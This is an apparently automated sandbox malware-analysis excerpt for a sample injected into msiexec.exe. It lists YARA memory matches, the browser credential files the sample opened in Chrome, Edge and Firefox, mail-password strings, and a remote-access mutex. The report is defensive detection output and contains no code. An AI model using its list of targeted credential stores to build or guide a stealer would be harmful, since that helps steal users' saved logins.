Source: Yara match File source: 00000007.00000002.3460765739.0000000006A1D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.3460765739.00000000069DA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: msiexec.exe PID: 3976, type: MEMORYSTR
Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.db Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Code function: ESMTPPassword 13_2_004033F0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy, PopPassword 13_2_00402DB3
Source: C:\Windows\SysWOW64\msiexec.exe Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy, SMTPPassword 13_2_00402DB3
Source: Yara match File source: Process Memory Space: msiexec.exe PID: 3976, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: msiexec.exe PID: 6672, type: MEMORYSTR

Remote Access Functionality

barindex
Source: C:\Windows\SysWOW64\msiexec.exe Mutex created: \Sessions\1\BaseNamedObjects\Rmc-KC5V8F Jump to behavior
Source: Yara match File source: 00000007.00000002.3460765739.0000000006A36000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.3460765739.0000000006A1D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.3460765739.00000000069DA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: msiexec.exe PID: 3976, type: MEMORYSTR
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs